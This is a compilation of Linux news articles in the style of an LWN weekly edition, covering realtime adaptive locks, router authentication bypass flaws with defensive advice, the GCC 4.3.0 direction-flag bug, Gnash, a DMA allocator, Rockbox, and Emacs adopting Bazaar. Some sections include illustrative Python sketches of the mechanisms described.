

Mortadelo's impact isn't so much in the application itself as it is in some
of the ideas behind it.  Using SystemTap for GUI tools will help users and
administrators, especially those who are not command-line
savvy.  If Mortadelo, or some descendant of it, becomes popular, that will
help make SystemTap use more widespread.  Distributors will start packaging
it in more readily usable forms, perhaps installing it by default.  That
will in turn help anyone tasked with keeping a Linux system smoothly
functioning, whether they are GUI-centric or not.


		Realtime adaptive locks


The realtime patchset has one overriding goal: provide deterministic
response times in all situations.  To that end, much work has been done to
eliminate places in the kernel which can be the source of excessive
latencies; quite a bit of that work has been merged into the mainline over
the last two years or so.  One of the biggest remaining out-of-tree
components is the sleeping spinlock code.  Sleeping spinlocks have
advantages and disadvantages.  A recently posted set of patches has the
potential to significantly reduce one of the biggest disadvantages of the
realtime spinlock code.


Mainline spinlocks work by repeatedly polling a lock variable until it
becomes available.  This busy-waiting code thus "spins" while waiting for a
lock.  Spinlocks are quite fast, but they can also be a source of
significant latencies: a processor which is holding a lock can delay others
for indefinite amounts of time.  In the mainline kernel, it is also not
possible to preempt a thread which holds a spinlock - another source of
latencies.  (See this article
for a more detailed description of the mainline spinlock implementation).


The realtime patch set addresses this problem in a couple of ways.  One of
those is to cause threads waiting for a contended lock to sleep rather than
spin.  As a result, lock contention cannot create latencies on processors
which are not holding the lock.  When spinning is removed, it is also
possible to make code preemptible even when it holds a lock without causing
deadlock problems.  That allows a high-priority process to run regardless
of any lower-priority processes which might currently hold locks on the
current CPU.  Finally, the realtime patch set has added priority awareness
and priority inheritance to the locking code to ensure that the
highest-priority process is always able to run.


This is all good stuff, but there is one little disadvantage: the extra
overhead imposed by the more complicated locks can reduce system throughput
considerably.  This is a cost that the realtime developers have been
willing to pay; it is often necessary to make trade-offs between throughput
and latency.  Recently, though, some developers at Novell have come to the
conclusion that the throughput cost of the realtime patch set need not be
as severe as it currently is; the resulting adaptive realtime locks patch
brings the throughput of the realtime kernel to a level much closer to that
found in the mainline - at least, for some workloads.


The core observation encapsulated in this patch set is that hold times for
spinlocks tend to be quite short, especially in the realtime kernel.  So
the cost of putting a waiting thread to sleep may well exceed the cost of
simply busy-waiting until the lock becomes free.  So adaptive locks behave
more like their mainline counterparts and simply spin until the lock becomes
available.  There are some twists, though, which are necessitated by the
realtime system:


 The spinning cannot go on forever, since it may cause unacceptable 
     latencies elsewhere in the system.  So an adaptive lock will only spin
     up to a configurable number of times (the default is 10,000) before
     giving up and going to sleep.

 Since lock holders are preemptible in the realtime kernel, it is
     possible that the thread which currently holds the lock was previously
     running on the same CPU as the process trying to acquire the lock.  In
     that situation, spinning for the lock is 
     clearly a bad thing to do.  In the absence of a loop counter, it would
     be a hard deadlock situation; with the counter, it would just be an
     unnecessary delay.  Either way, the result is undesirable, so, if the
     lock owner is running on the same 
     processor, the thread waiting for the lock simply goes to sleep.

 If the lock owner is, instead, itself sleeping while waiting for something,
     there is little point in having another thread stay awake in the hope
     that the owner will release the lock soon.  So, in this case too, a thread
     contending for a lock will simply go to sleep rather than spin.
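
Taken together, these rules amount to a small decision procedure.  The
Python sketch below restates them; it is a model of the logic as described
here, not the patch itself, and the callables passed in (try_lock,
owner_cpu, owner_sleeping) are hypothetical stand-ins for state the kernel
would read directly.

```python
MAX_SPINS = 10_000   # the default spin limit mentioned above


def adaptive_wait(try_lock, owner_cpu, owner_sleeping, my_cpu,
                  max_spins=MAX_SPINS):
    """Return "acquired" if spinning won the lock, "sleep" otherwise."""
    for _ in range(max_spins):
        if try_lock():
            return "acquired"
        if owner_cpu() == my_cpu:
            # The owner cannot run while we spin on its CPU.
            return "sleep"
        if owner_sleeping():
            # The owner is not going to release the lock soon.
            return "sleep"
    # Spun long enough; stop burning CPU time and sleep instead.
    return "sleep"
```

The checks are repeated on every pass because the owner's state can
change while the waiter spins.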


One other throughput improvement is obtained by changing the lock-stealing
code.  Locks in the realtime system are normally fair, in that threads
waiting for a lock will get it in first-come-first-served order.  A
higher-priority process will jump the queue, however, and "steal" the lock
from lower-priority processes which have been waiting for longer.  The
adaptive locks patch tweaks this algorithm by allowing a running process to
steal a lock from another, equal-priority process which is sleeping.  This
change adds some unfairness to the locking code, but it allows the system
to avoid a context switch and keep a running, cache-warm process going.
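
The stealing rule, before and after the change, can be written as a single
predicate.  This is a sketch of the policy as described above rather than
the patch's code; the function name is hypothetical, and it assumes that a
larger number means a higher priority.

```python
def may_steal(thief_priority, waiter_priority, waiter_sleeping, adaptive=True):
    """May a running thread take the lock ahead of a queued waiter?

    Assumption for this sketch: larger numbers mean higher priority.
    """
    if thief_priority > waiter_priority:
        return True                     # the original rule: priority wins
    if adaptive and thief_priority == waiter_priority and waiter_sleeping:
        return True                     # the new rule: avoid a context switch
    return False
```

With adaptive set to False the predicate reduces to strict priority
ordering, which is the fair behavior the realtime locks had before.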

Some benchmark results [PDF] have been posted.  On the test system, the
dbench benchmark runs at about 1500 MB/s on a stock 2.6.24 system, but
at just under 170 MB/s on a system with the realtime patches applied.
The adaptive lock patch raises that number back to over 700 MB/s -
still far from a mainline system, but much better than before.  The
improvement in hackbench results is even better, while the change in the
all-important "build the kernel" benchmark is small (but still positive).
A fundamental patch like this will require quite a bit of review and
testing before it might be accepted.  But the initial results suggest that
adaptive locks might be a big win for the realtime patch set.

		A draft proposal for Fedora spins


This week Jeff Spaleta posted a draft
proposal for a spin submission and approval process.  For those
interested in creating officially approved Fedora spins, it is worth a
look.

Anyone can create a Fedora spin for their personal use.  Just create a
kickstart file to install the packages you want.  There are various ways of
doing this, but the Anaconda
kickstart is probably the most common.  This kickstart file tells the
Anaconda installer what packages you want, and you have your own Fedora
spin.

This draft is about creating official spins that will be listed at the Fedora Project Spins Tracker,
and available for interested users to get the official Fedora spin of their
choice.  However, there does need to be a way to cleanly distinguish between
Released Spins and Contributed Spins.

What will it take to create an official Fedora spin according to this
proposal?  The first step is to get a kickstart file into the Kickstart Pool,
where the file will be reviewed and tested by a peer group of Spin
Maintainers.  If the peer group approves then the spin proposal goes to the
board for review.  If the Fedora Board approves the spin it will be granted
trademark usage and from there it can be added to the Fedora CVS.

A number of steps need to be completed for this plan to work.  First is the
creation of Spin Guidelines.  The guidelines will specify a minimum level
of technical quality for kickstart files, and contain a naming scheme for
new spins.  The not-yet-formed peer group of Spin Maintainers will have
some say in these Guidelines, although the release engineering team will
probably create the first draft.

There is a long way to go to get a straightforward way for a Fedora Special
Interest Group (or anyone else) to get a spin approved, but such things
always have a start somewhere.

		Authentication bypass in routers


An authentication bypass vulnerability is one of the more dangerous problems
that a web application can have.  It allows the attacker to perform some
action that the application designer saw fit to restrict to authenticated
users without providing said authentication.  Using these
techniques, an attacker can control a targeted web application from afar without
even wasting time cracking bad passwords—a dream
scenario for such people.


If an authentication bypass is found in the latest social networking site, the flaw could cause
embarrassment, but if that bypass is in your home router, much worse things
could result.  A series of articles over at GNUCITIZEN highlights quite a
variety of authentication bypass flaws in various embedded devices
including routers.  The flaws come from
their research and recent router
hacking challenge, which challenged readers to find holes in
their routers.  (There is no table of contents for the series, so here are links to
the four installments: 1, 2, 3, and 4).


Most authentication bypass flaws are caused by a conceptual mistake made by
web programmers: believing that the "normal" way of accessing the site is
the only way to access it.  This manifests itself as applications that
check for particular URLs to see if they require credentials without
considering the possibility of aliasing.  For example, web servers will
generally ignore double-slashes in a URL, but if the application checks for
/privileged/page and gets /privileged//page it may very
well fall prey to an authentication bypass.  Other similar schemes can be
used to make the URL look different, but arrive at the same place.
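
A short Python sketch shows both the mistake and one way around it.  The
protected path comes from the example above; the function names are
hypothetical, and reducing every request path to a canonical form before
the check is just one possible defense, not a description of what any
particular router does.

```python
import posixpath
from urllib.parse import unquote

PROTECTED = {"/privileged/page"}


def naive_requires_auth(path):
    """The mistaken check: compare the raw request path."""
    return path in PROTECTED


def canonical(path):
    """Decode %-escapes, then collapse '//', '.' and '..' components."""
    decoded = unquote(path)
    return posixpath.normpath("/" + decoded.lstrip("/"))


def requires_auth(path):
    """Compare the canonical form, so aliases of a URL are caught too."""
    return canonical(path) in PROTECTED
```

The naive check is fooled by /privileged//page, while the canonical
form of that path is the protected one.  An application which simply
checks credentials on every request does not need this kind of matching
at all.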


A far uglier possibility is applications that believe you can only get to a
particular URL via a page that enforces authentication.  This is a belief
in "security through obscurity"; that attackers won't be able to guess the
URLs for the pages "behind" the authentication screen.  This is almost
comical in that there are many ways to find out what those URLs are,
not least by buying the device and accessing them yourself.  Pages that
require authentication need to check that the credentials have been
provided whenever the page is accessed—without regard for what
URL got them there.


Some applications do all of the checking correctly on the pages that show
various settings in a form allowing them to be changed, but the action of
the form submits it to a different program.  Inexplicably, sometimes that
program does not check for credentials.  Perhaps the programmer believes
that web forms can only be submitted from the page that they have created, but it is
trivially easy to generate an HTTP POST with the appropriate parameters.
It certainly does no good to protect the current value of settings from
non-authenticated users if they can easily change them to any values they
want. 


In terms of web security, authentication bypass is usually quite easy to
avoid; it is a matter of checking for valid credentials anywhere they are
required.  Before performing any action that requires a logged-in user,
check the cookie (or other persistent authentication mechanism) for
validity to perform the action requested.  For people using routers at
home, perhaps the best advice is to make sure the router's administrative
interface is not internet facing.  Routers have a pretty bad track record
of getting this right, so far, as the hacking challenge and other research
have shown.
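
One way to make sure that the check happens everywhere is to attach it to each handler rather than to the page that normally leads there.  The following is a minimal sketch under invented assumptions: requests are plain dictionaries, SESSIONS is a stand-in for a real session store, and none of the names come from any actual router firmware or web framework.

```python
import functools

# Hypothetical in-memory session store: cookie value -> user name.
SESSIONS = {"s3cr3t-token": "admin"}

class Unauthorized(Exception):
    """Raised when a request carries no valid session cookie."""

def login_required(handler):
    """Wrap a handler so the credential check runs on every call."""
    @functools.wraps(handler)
    def wrapper(request, *args, **kwargs):
        token = request.get("cookies", {}).get("session")
        if token not in SESSIONS:
            raise Unauthorized(handler.__name__)
        return handler(request, *args, **kwargs)
    return wrapper

@login_required
def show_settings(request):
    """Page that displays the settings form."""
    return "settings form"

@login_required
def apply_settings(request):
    """Form target; it needs the same check as the page showing the form."""
    return "settings changed"
```

The point of the decorator is that the form target gets exactly the same check as the form itself, so a hand-crafted POST without a valid cookie is refused no matter where it came from.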


		GCC 4.3.0 exposes a kernel bug


A change to GCC for a recent release coupled with a kernel bug has created
a messy situation, with possible security implications.  GCC changed some
assumptions about x86 processor flags, in accordance with the ABI standard,
that can lead to memory corruption for programs built with GCC 4.3.0.  No
one has come up with a way to exploit the flaw, at least not yet, but it
clearly is a problem that needs to be addressed.  


The problem revolves around the x86 direction flag (DF), which governs
whether block memory operations operate forward through memory or
backwards.  The main use for the flag is to support overlapping memory
copies, where working backwards through memory may be required so that the data
being copied does not get overwritten as the copy progresses.  Debian
hacker Aurélien Jarno reported the problem, which was found when building
Steel Bank Common Lisp (SBCL) with the new compiler, to linux-kernel on
March 5th.


GCC's most recent
release, 4.3.0, assumes that the direction flag has been cleared
(i.e. memory operations go in a forward direction) at the entry of each
function, as is specified by the ABI (which is, somewhat amusingly, found at
sco.com [PDF]).  Unfortunately, this clashes with
Linux signal handlers, which get called, incorrectly, with the flag in
whatever state it was in when the signal occurred.  This has the effect of
leaking one bit of state from the user space process that was running when
the signal occurred to the signal handler, which could be in another process.


That, in itself, is a bug, seemingly with fairly minimal impact.  Prior to 4.3, GCC
would emit a cld (clear direction flag) opcode before doing inline
string
or memory operations, so those operations would start from a known state.
In 4.3, GCC relies on the ABI mandate that the direction flag is cleared before
entry to a function, which means that the kernel needs to arrange that
before calling a signal handler.  It currently doesn't, but a small patch fixes that.


The window of vulnerability is small, but was observed in SBCL.  The
sequence of events that would lead to memory corruption is as follows:

a user space program does an operation (memmove() for example) that sets DF
a signal occurs for some process
the kernel calls the signal handler
the signal handler does a memmove() in what it thinks is a forward direction
the memory is copied in the reverse direction, leading to corruption
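
The effect of that sequence can be modeled in a few lines.  This is only a simulation, not kernel or compiler code: rep_movsb() is a simplified stand-in for the x86 string-move instruction, and handler_copy() plays the part of a signal handler compiled on the assumption that DF is clear.

```python
def rep_movsb(mem, dst, src, count, df):
    """Model of an x86 'rep movsb': copy count bytes, stepping by DF.

    With DF clear the two pointers advance after each byte; with DF set
    they move downward instead.
    """
    step = -1 if df else 1
    for _ in range(count):
        mem[dst] = mem[src]
        dst += step
        src += step

def handler_copy(mem, df_on_entry):
    """Signal-handler code built on the assumption that DF is clear.

    It sets up its pointers for a forward copy of 4 bytes from offset 8
    to offset 4 and never clears the flag first.
    """
    rep_movsb(mem, dst=4, src=8, count=4, df=df_on_entry)
    return mem
```

Starting from the buffer 0123abcdWXYZ, the handler produces 0123WXYZWXYZ when DF is clear on entry.  With DF set, the same code yields 0bcdWbcdWXYZ: only one byte lands where it was meant to, and three bytes below the destination are overwritten.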

It is hard to see how that could be turned into a security breach, but it
would be a mistake to assume that it can't.  Other kernel bugs, like the
one that allowed the recent vmsplice()
exploit, have looked like memory corruption, but were found to be more than
that.  The DF issue may turn out to be harmless from a security standpoint,
but it should not be assumed.


So, now the question is: what to do about it.  It is clear that the kernel
should not leak the DF state to signal handlers, regardless of what GCC
does.  It is interesting to note that this behavior is the same (DF is not
cleared on entry to a signal handler) on BSD
kernels, leading some to claim that it is the ABI that is incorrect and
that GCC should revert to its old behavior.  Solaris kernels do
clear the DF before calling signal handlers.  This problem has existed for
15 years; GCC has always emitted code that worked correctly on kernels
that did not follow the ABI, until now.


Part of the problem is that there are an enormous number of installed
kernels that are vulnerable to this problem, but only if GCC 4.3 is
installed.  That version of GCC is not, yet, in widespread use, so the
thinking is that GCC should revert its behavior now, before it gets into
distributions.  As kernels with the fix become more widespread, the
"proper" behavior could be restored.  The GCC folks don't necessarily see
it that way, so it is unclear what will happen.


While it is true that distributors can control what kernel version and GCC
version they ship, those aren't the only ways that either GCC or
GCC-compiled binaries get installed.  It is a bit of a ticking time bomb for
random memory corruption at a minimum.  Handling those bug reports will be
very difficult and time consuming.  While the new behavior of GCC is
correct, and the kernel is broken, it would be very helpful to back out
this change, perhaps providing the new behavior via a command-line argument
for those who are sure their binaries will be running on patched kernels.   Some discussion
on the gcc-devel list would indicate that a GCC 4.3.0.1 or 4.3.1 may be
forthcoming.  


		Still waiting for Flash


Those of us who were using Linux full-time around the turn of the century
will remember that the state of web browsing on Linux was a little scary
then.  The only real option available was the binary-only Netscape 4
client; it was buggy and old.  It really seemed like the web was going to
move forward without Linux, and that there was not a whole lot we could do
about it.


Things have improved somewhat on that front; we now have a few top-quality
web browsers to choose between.  At the same time, though, one might be
forgiven for thinking that we are heading back into a similar situation,
but involving Flash this time around.  For all practical purposes, there is
only one viable option for Flash on Linux: the binary-only plugin provided
by Adobe.  But that plugin is not just proprietary software; it also is
somewhat old and buggy, and there is nothing we can do to fix it.  For an
increasing part of the web experience, we still have a second-rate,
proprietary platform.


When one thinks of Flash, naturally, one thinks of video sites like
YouTube.  But there is more to the Flash experience than silly videos and
obnoxious advertising.  Some parts of Google are heavily into Flash, as can
be seen from that company's finance sites or analytics offerings.  Your
editor's children will attest that there's no end of game sites which
require Flash, and for which the Linux plugin fails to work properly.
Looking for any way to reduce the total amount of time spent in airplane
seats, your editor recently investigated "around the world" tickets; that
search ended up at this
travel planning site which, of course, requires Flash.  And so on.
Like it or not, Flash is the language in which an increasing number of
interactive sites are being coded, and Linux does not have proper support
for it.


With this in mind, your editor decided to give the recently-announced Gnash 0.8.2 release a try.  This
release was billed as the first beta version of Gnash, so there was reason
to hope that it would be something close to a true solution to the Flash
problem.  In reality, Gnash is a step in the right direction, but the Flash
issue will be with us for some time yet.


For now, the acid test for a Flash player would appear to be YouTube, so
that is the first place your editor went.  The experience there was mixed.
It is, in fact, possible to watch YouTube videos using the Gnash Firefox
plugin.  Hearing them is another matter, though; they all played silently.
It would not be surprising to learn that getting audio is a matter of
filling in a missing codec - but it would sure be nice if the software were to
say something to that effect.  Pausing and playing the video worked, but
skipping around in it did not.  Playing videos from other sites was
uniformly unsuccessful.


The "around the world" calculator appeared to load properly, but then took
off as if somebody were punching all of its buttons at once.  Charts on
Google sites are uniformly blank.  Some Flash games mostly worked; others
showed more input-related confusion.  Few of them were truly playable.  On
the other hand, Flash "intros" and advertisements mostly work as intended -
just what your editor wanted.


So Gnash is not really there yet.  In truth, this software is not in a
condition where the use of the term "beta" makes sense; there is a
lot of work yet to be done.  There are few of us clamoring for
support for more obnoxious advertising - especially among the LWN
readership, as your plentiful emails over the last couple of months have
made clear.  What we want is working support for the useful Flash
applications out there - and there are a few of those at this point.  Gnash
does not, currently, provide that support.  (Your editor also tried out Swfdec 0.6.0, with generally
worse results).


That said, it is clear that a lot of work has been done to get Gnash to
this point.  Your editor has no real way to judge how much more is required
to get full support for even Flash version 7; chances are it is not a
small job.  Needless to say, support for newer versions of Flash will
require even more work.  But there now appears to be a solid platform upon
which that work can be done, and that is an important start.  Gnash has the
look of a project which has overcome some of the biggest initial hurdles
and is now setting a pace to finish the job.  With luck, it will have
reached the point where the fact that it almost works will inspire
new developers to come in and fill in the remaining pieces.


Adobe has the ability to make this job a lot easier.  Your editor has
heard, informally, that the company has taken a less hostile position
toward the Gnash developers than it had in the past, but it certainly is still not
helping them.  The Flash specifications are not available to anybody trying
to create a Flash player, and, unsurprisingly, the Flash EULA
forbids any sort of reverse engineering.  That EULA, incidentally, also
forbids running Adobe's player on any "non-PC device," including tablets
and phones.  That restriction suggests that Adobe sees business
opportunities in the lack of a free Flash player for such systems and
intends to ensure that this scarcity continues.  So, despite the
occasionally friendly noises Adobe has been making toward the Linux
community, we should not expect a great deal of help from that direction. 


Someday, people will figure out that closed standards (like Flash) are best
avoided.  Meanwhile, Flash is a fact of life that we will need to
deal with.  It appears that we are getting closer to being able to deal
with it - but we are not there yet.

		A better DMA memory allocator


As any device driver author knows, hardware can be a pain sometimes.  In
the early days of Linux, peripherals attached to the ISA bus inflicted
their particular variety of pain by being unable to use more than
24 bits to access memory.  What that meant, in practical terms, was
that ISA devices could not perform DMA operations on memory above 16MB.
The PCI bus lifted that restriction, but, for some time, there were quite a
few "PCI" devices that were minimally modified ISA peripherals; many of
those retained the 16MB limit.

To handle the needs of these devices, Linux has long maintained the DMA
memory zone.  Drivers which need to allocate memory from that zone would
specify GFP_DMA in their allocation requests.  The memory management code
takes special care to keep memory in that zone available so that DMA
requests can be satisfied.  In this way, the system can provide reasonable
assurance that memory will be available to perform DMA in ways which meet
the special needs of this particularly challenged hardware.

The only problem is that there aren't a whole lot of devices out there
which still have the old 24-bit addressing limitation.  So the DMA zone
tends to sit idle.  Meanwhile, there are devices with other sorts of
limitations.  Many peripherals only handle 32-bit addresses, so their DMA
buffers must be allocated in the bottom 4GB of memory.  There is a subset,
however, with stranger limitations - 30 or 31-bit addresses, for example.
The kernel's DMA library provides a way for drivers to disclose that sort
of embarrassing limitation, but the memory management code does not really
help the DMA layer make allocations which satisfy those constraints.  So
drivers for such devices must use the DMA zone (which may not be present on
all architectures), or hope that normal zone memory fits the bill.

Andi Kleen has set out to clean up this situation with a new DMA memory allocator.  His
solution is to take a chunk of memory out of the kernel's buddy allocator
entirely and manage it in an entirely different way, forming a reserve pool
for DMA allocations.  The result is a bit
of a departure from normal Linux memory management algorithms, but it may
well be better suited to the task at hand.


The new "mask" allocator grabs a configurable chunk of low memory at boot
time.  Allocations from this region are made with a separate set of calls,
with the core API being:


alloc_pages_mask() looks a lot like the longstanding
alloc_pages() function, but there are some important differences.
The size parameter is the desired size of the allocation, rather
than the "order" value used by alloc_pages(), and mask
describes the range of usable addresses for this allocation.  Though
mask looks like a bitmask, it is really better understood as the
maximum address value that the allocated memory should have; "holes" in the
mask would make no sense.

A call to alloc_pages_mask() will first attempt to allocate the
requested memory using the normal Linux memory allocator, on the assumption
that the reserved DMA memory is an especially limited resource.  If the
allocation fails, perhaps because there's no physically-contiguous chunk of
sufficient size available, then the allocator will dip into the reserved
DMA pool.  If the normal allocation succeeds, though, the allocated memory
must still be tested against the maximum allowable address: the normal
memory allocator, remember, has no support for allocating below an arbitrary
address.  So if the returned memory is out of bounds, it must be
immediately freed and the reserved pool will be used instead.
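
The order of operations described above can be modeled outside the kernel.  The sketch below is not Andi's code; normal_alloc, normal_free and pool_alloc are hypothetical callables standing in for the buddy allocator and the reserved pool, and addresses are plain integers.

```python
def alloc_with_mask(size, mask, normal_alloc, normal_free, pool_alloc):
    """Model of the fallback order described above.

    normal_alloc(size) returns a start address or None; it knows nothing
    about address limits.  pool_alloc(size, mask) allocates from the
    reserved pool.  All three callables are stand-ins for this sketch.
    """
    addr = normal_alloc(size)
    if addr is not None:
        if addr + size - 1 <= mask:
            return addr              # normal memory happened to fit
        normal_free(addr, size)      # out of bounds: give it back
    return pool_alloc(size, mask)    # dip into the reserved pool
```

The reserved pool is touched only when the normal allocator fails outright or hands back memory above the limit, which is what keeps the pool available for the cases that really need it.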

That reserved pool is not managed like the rest of memory.  Rather than the
buddy lists maintained by the normal page allocator, the DMA allocator has a
simple bitmap describing which pages are available.  It will normally cycle
through the entire memory region, allocating the next available chunk of
sufficient size.  If that chunk is above the memory limit, though, the
allocator will move back to the lower end of the reserved pool and allocate
from there instead.  Since DMA allocations tend to be short-lived, one
would expect that a suitable block of memory would either be available or
become available in the near future.
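
A toy version of such a bitmap-managed pool might look like the following.  It is a rough model of the behavior described above rather than a transcription of the patch: the class name, the page-number interface, and the exact search policy are all assumptions made for the example.

```python
class BitmapPool:
    """Toy page pool tracked by one in-use flag per page."""

    def __init__(self, npages):
        self.used = [False] * npages
        self.cursor = 0                    # where the next search starts

    def _find(self, start, end, count):
        """Return the first run of `count` free pages in [start, end)."""
        run = 0
        for page in range(start, end):
            run = run + 1 if not self.used[page] else 0
            if run == count:
                return page - count + 1
        return None

    def alloc(self, count, max_page):
        """Allocate `count` pages, none numbered above max_page."""
        limit = min(max_page + 1, len(self.used))
        first = None
        if self.cursor < limit:
            first = self._find(self.cursor, limit, count)
        if first is None:                  # wrap to the low end of the pool
            first = self._find(0, limit, count)
        if first is None:
            return None
        for page in range(first, first + count):
            self.used[page] = True
        self.cursor = first + count
        return first

    def free(self, first, count):
        """Mark a previously allocated run of pages as available again."""
        for page in range(first, first + count):
            self.used[page] = False
```

Successive allocations march upward through the pool; a request whose limit lies below the cursor wraps around and is satisfied from whatever has been freed at the low end in the meantime.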

One other difference of note is that, unlike the slab allocator, the DMA
allocator does not round memory allocation sizes up to the next power of
two.  DMA allocations can be relatively large, so that rounding can result
in significant internal fragmentation and memory waste.
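
The cost of that rounding is easy to put numbers on.  The arithmetic below assumes 4096-byte pages and an allocator that hands out power-of-two page counts; both function names are made up for the example.

```python
PAGE_SIZE = 4096  # assumed page size for the example

def pages_needed(size):
    """Whole pages required to hold `size` bytes."""
    return -(-size // PAGE_SIZE)           # ceiling division

def pages_power_of_two(size):
    """Pages consumed when the page count is rounded up to a power of two."""
    order = (pages_needed(size) - 1).bit_length()
    return 1 << order
```

A 1100KB buffer needs 275 pages, but a power-of-two allocator would set aside 512 of them, leaving 237 pages (nearly half of the allocation) unused.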

At the next level up, Andi has added a new form of mempool which uses the
DMA allocator:


This pool will behave like normal mempools, with the exception that all
allocations will be below the limit passed in as mask.  These pools are used
in the block layer, where memory allocations for DMA must succeed.


One might object that reserving a big chunk of low memory for this purpose
reduces the total amount of memory available to the system - especially if
the DMA allocator is cherry-picking normal memory whenever it can anyway.
But the cost is not as bad as one might think.  These patches do away with
the old DMA zone, which, for all practical purposes, was already managed as
a reserved (and often unused) memory area.  Some 64-bit architectures also
set aside a significant chunk (around 64MB) of low memory for the swiotlb -
essentially a set of bounce buffers used for impedance matching between
high memory (>4GB) buffers and devices which cannot handle more than
32-bit addresses.  With Andi's patch set, the swiotlb, too, makes
allocations from the DMA area and no longer has its own dedicated memory
pool.  So the total amount of memory set aside for I/O will not change very
much; it could, in fact, get smaller.


For most driver authors, there will be little in the way of required
changes if this patch set gets merged.  The DMA layer already allows
drivers to specify an address mask with dma_set_mask(); with the
DMA allocator in place, that mask will be better observed.  The one change
which might affect a few drivers is further down the line: eventually the
GFP_DMA memory allocation flag will go away.  Any driver which
still uses this flag should set a proper mask instead.

So far, there has been little discussion resulting from the posting of
these patches.  Silence does not mean assent, of course, but it would
appear that there is little opposition to this set of changes.

		Some topics related to MP3 players


In many parts of the world, the U.S. is looked upon as a place with
particularly poor taste in "intellectual property" legislation; the DMCA
and software patents are often held up as examples.  DMCA-like laws have
since spread to other parts of the planet, which, for some reason, has not
made people living there any more appreciative of the American legal
regime.  But it is often pointed out that software patents remain an almost
entirely American problem; people in other parts of the world (Europe, say)
need not worry about them.


If only it were so.  On March 5, German police raided a booth at the CeBit
conference in Hannover.  That booth, run by Meizu, contained an
iPhone-clone product, but nobody cared about that.  Instead, the contraband
which absolutely had to be suppressed was a music player for which Sisvel
(an Italian company which has done this kind of thing before)
had not been paid royalties on its MP3 patents.  The player, as it happens,
did not even have MP3 playback capability, but that didn't seem to matter.
The police duly cleared the booth of all mention of the offending device
and saved another day for free enterprise.


This is a pure software patent action, and the
U.S. has no part in it.  Software patents are truly a global problem.
(Police raids raise the stakes in an interesting way, though; even in the
U.S., things usually start with a polite letter from a lawyer).
Anybody who wonders why companies like Red Hat exercise great care around
software patents (and MP3 patents in particular) need only look at episodes
like this.  The selling of enterprise Linux products is likely to be
distinctly harder if your prospective customers see your conference booth
being forcibly shut down by the authorities.


Meanwhile, it occurred to your editor, while thinking about music players,
that little has been said about the Rockbox project on LWN in recent times.
Rockbox, remember, is a GPL-licensed firmware which runs on a wide
variety of music players.  It offers a wider range of features, has
more codecs, is more customizable, and has better accessibility support
than the stock firmware on any of these devices.  And it's free software.

Since LWN last looked at this project, the Rockbox developers have added a
number of new features and new platforms.  The planned 3.0 release has never
happened; the Rockbox developers appear to have given up on the idea of
formal releases for now.  The daily snapshots generally work quite well,
though, and there are lots of satisfied Rockbox users out there.


The only problem is: it's not clear how many more such users may arrive in
the future.  Despite the fact that Rockbox supports a lot of players,
absolutely none of the supported platforms are currently in production.  So
anybody looking to buy a player which can run Rockbox must go digging
around on auction sites.  Many Rockbox users do exactly that, but many more
potential users would rather not get their devices that way.

Rockbox ports to current devices are underway, but the developers are fighting an
uphill battle.  Manufacturers tend to be uncooperative when it comes to
releasing hardware information, so a certain amount of reverse engineering
is required.  And, by the time that work is done, the manufacturers have
moved on to a new product.  Music players are consumer electronics devices,
and, like most such devices, their product lifetime tends to be quite
short.  So developers on a project like Rockbox will forever be trying to
catch up.

Your editor, meanwhile, still lugs around his ancient iRiver H340.  People
look at it strangely, as if they expect there to be a hatch on the back
so that the user can occasionally add another shovel full of coal.  But it
works beautifully with Rockbox, and a replacement looks hard to find.  Your
editor wishes that at least one manufacturer would realize that it could
provide better functionality at a lower cost by designing its players to
run Rockbox from the beginning.  Perhaps the project needs better advocacy
within the player industry.


There is another approach which could be considered here.  The OpenMoko
project is trying to rearrange the mobile telephone market by offering a
completely open product.  Surely a music player, being a much simpler
device, would be amenable to the same treatment?  As it turns out, there
are a couple of groups of people trying to jump-start just this kind of
effort.  They have a
prototype design, and a
competing design as well.  Both look like they could produce a
respectable player at a reasonable cost - a player designed to run free
software from the outset.


Designing a device which can run Rockbox and produce decent audio (and
video) output is not that hard, given the components which are available.
Turning it into a product which is small and sleek enough that people want
to buy it seems likely to be harder.  Getting a full device manufactured at
a reasonable cost may be the hardest of all; that requires significant
up-front money and a distribution channel which can sell enough units to make
the whole thing cost-effective.  There's also the little issue of those MP3
patents to take care of.


There is no real sign that the Rockbox player developers are thinking on
this level at this time.  One of the prototype designs carries a Creative
Commons noncommercial license in an attempt to prevent others from thinking
that way.  So the resulting hardware may end up being little more than a
kit for especially dedicated hobbyists.  Unless somebody picks up the ball
and tries to commercialize a product like this, Rockbox may be stuck in its
role as the software of choice for last year's players.  The good news in
all this is that Linux-based tablet devices seem likely to become cheaper,
more abundant, and more compact.  Since these devices can make fine media
players, we may eventually get our completely open gadget via that path.
Modulo patent problems, of course.

		Emacs chooses Bazaar


The Emacs development process is undergoing some changes; Richard Stallman
has handed off project
maintenance duties, while a change in the version control system (VCS)
seems to be in the offing.  Some of the modernization suggestions made by
Eric Raymond last December are taking root.  Stallman has not completely
stepped away from Emacs development—it's doubtful anyone expected him
to—but his approach on how to choose a VCS for Emacs is raising a few
eyebrows. 


Currently, Emacs is tracked with CVS, but a distributed VCS (DVCS) is definitely
planned down the road—how far is unclear at this point.  In
earlier discussions, Stallman was particularly interested in the offline
capabilities of DVCS; being able to do commits, diffs, and see revision
history while 
unconnected to the internet is a useful feature for him.  Many other Emacs
developers see a DVCS as a major upgrade to the development process; the
question then becomes which DVCS to use.


The main contenders are git, Mercurial (aka hg), and Bazaar (aka bzr); there are other options, of
course, but they were quickly
eliminated due to speed or feature set issues.  There was some hope that
a comparative VCS study that Raymond was working on would help lead the project to the proper
choice, but the study has been delayed—a major release of Wesnoth is
underway which has taken Raymond from that task.


There were some discussions of the merits of the various systems but, in
the meantime, Bazaar joined the GNU project which changed the equation
somewhat.  Stallman announced:

We should use Bzr because that is becoming a GNU package.
GNU packages should show loyalty to each other when possible,
and in this case it is possible.


As might be expected, short-circuiting a technical discussion for a
political expedient was not met with universal approval.  Juanma Barranquero
sums up his (and others') objections:

What I'm trying to say is: I won't discuss which dVCS we choose
(unless it makes Windows development a PITA). But I agree with Jeremy
Maitin-Shepard that the cause of free software is strengthened by us
selecting among the free alternatives the one that best serves our
technical, not political, needs.


There is a certain irony in noting that one of the perceived weaknesses of git was its
poor support for Windows development.  It is
certainly understandable, but the idea that one of the flagship GNU
projects would make a decision based on tool availability for a proprietary
operating system gives one pause.  That isn't one of
Stallman's requirements, of course; he sees the decision as essentially a choice amongst
equals:

We already know the most important thing about what we will find from
a careful study of git, mercurial and Bzr.  We will find that each has
its advantages and disadvantages -- but none of them conclusive.  Each
will be preferred by some people, but any one of them would work out
well enough.


